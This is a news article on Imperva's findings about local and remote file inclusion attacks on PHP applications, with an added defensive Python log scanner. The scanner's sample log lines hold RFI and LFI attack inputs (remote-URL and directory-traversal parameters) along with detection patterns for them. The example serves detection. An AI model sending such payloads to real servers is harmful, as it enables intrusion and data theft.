Despite accounting for a fifth of attacks on applications, awareness of remote and local file inclusion is worryingly low.
According to Imperva, local file inclusion (LFI) and remote file inclusion (RFI) attacks accounted for 21 per cent of all application attacks between June and November 2011 on 40 applications. The method allows an attacker to execute malicious code on a server to steal data.
Talking to SC Magazine, Imperva senior security strategist Noa Bar-Yosef said that in an RFI attack the attacker uploads malware to the server, so it is an underlying application security threat, and one prevalent enough to rank among the top four attack techniques.
“This targets PHP applications, which affect 77 per cent of web sites, so the prospect is large. The TimThumb vulnerability was an RFI attack, and so was the attack at the military dating site. This shows that file inclusion attacks are among the many top techniques we've seen,” she said.
She also said that RFI attacks are automated, with attackers using botnets to take advantage of vulnerabilities.
“SQL injection is the number-one technique to attack applications to take away data, but we're seeing better techniques. An RFI attack may cause a crash, extract data and permit an attacker to take over a server. We saw a rise within the second half of 2011, and what's concerning is this doesn't appear within the OWASP top ten attacks,” Bar-Yosef said.
An LFI attack is conducted when a file is included locally: the server is tricked into including a file that is already on it rather than fetching one (as opposed to an RFI, where the file is fetched from a remote server).
A simple means of infection is via a JPEG file that may actually contain .TXT code and can be used against an RFI vulnerability.
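To make the LFI/RFI distinction above concrete from a defender's side, here is an added example (not code from the article or from Imperva) that scans constructed access-log lines and classifies each request as an RFI attempt (the included file is fetched from a remote URL) or an LFI attempt (directory traversal to a file already on the host), and counts hits per source address as a hint of the automated scanning the article describes. The log lines, IP addresses and parameter names are constructed for the example.

```python
"""Classify constructed web-server access log lines as LFI or RFI attempts.

Added example, not from the article or Imperva. The log lines are constructed
and the heuristics illustrate the kind of check a web application firewall
or log review would apply; they are not a complete detector.
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines in Apache/nginx "combined" log format.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Jan/2012:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.5 - - [12/Jan/2012:10:01:03 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 88
198.51.100.9 - - [12/Jan/2012:10:01:04 +0000] "GET /index.php?page=../../../../config.php HTTP/1.1" 200 1024
198.51.100.9 - - [12/Jan/2012:10:01:05 +0000] "GET /index.php?page=%2e%2e%2f%2e%2e%2fconfig.php HTTP/1.1" 403 0
192.0.2.44 - - [12/Jan/2012:10:02:00 +0000] "GET /timthumb.php?src=http://198.51.100.7/x.txt HTTP/1.1" 200 40
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
REMOTE_RE = re.compile(r"^(https?|ftp)://", re.IGNORECASE)  # RFI: file fetched from elsewhere
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")                     # LFI: file already on the host


def classify_request(path):
    """Return 'rfi', 'lfi' or None for one request path, using the article's
    distinction: RFI pulls the file from a remote server, LFI includes one
    that is already on the server (here reached via directory traversal)."""
    for _name, value in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        value = unquote(value)  # parse_qsl decoded once; this catches double encoding
        if REMOTE_RE.match(value):
            return "rfi"
        if TRAVERSAL_RE.search(value):
            return "lfi"
    return None


def scan_log(text):
    """Return (findings, hits_per_ip). findings is a list of (ip, kind, path);
    hits_per_ip shows which sources repeat, a hint of automated scanning."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            kind = classify_request(m.group("path"))
            if kind:
                findings.append((m.group("ip"), kind, m.group("path")))
    return findings, Counter(ip for ip, _, _ in findings)


if __name__ == "__main__":
    for ip, kind, path in scan_log(SAMPLE_LOG)[0]:
        print(f"{kind.upper()} attempt from {ip}: {path}")
```

A real deployment would feed such findings into the web application firewall or blocklist the article recommends rather than only printing them.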
Asked how this can be blocked or avoided, Bar-Yosef cited the major areas of application security: look for discussions about your security online; blacklist IP addresses you know to be bad; install a web application firewall; consider a vulnerability assessment tool whose findings feed into the firewall; and look to prevent automated attacks.
She said: “Also fix your code as, ultimately, to be secure you ought to be secure yourself.”
Tal Be'ery, Imperva's senior web researcher, said: “LFI and RFI are popular attack vectors for hackers because they're less known and intensely powerful when successful. We observed that hacktivists and for-profit hackers utilised these techniques extensively in 2011, and we believe it's time for the safety community to devote more attention to the difficulty.”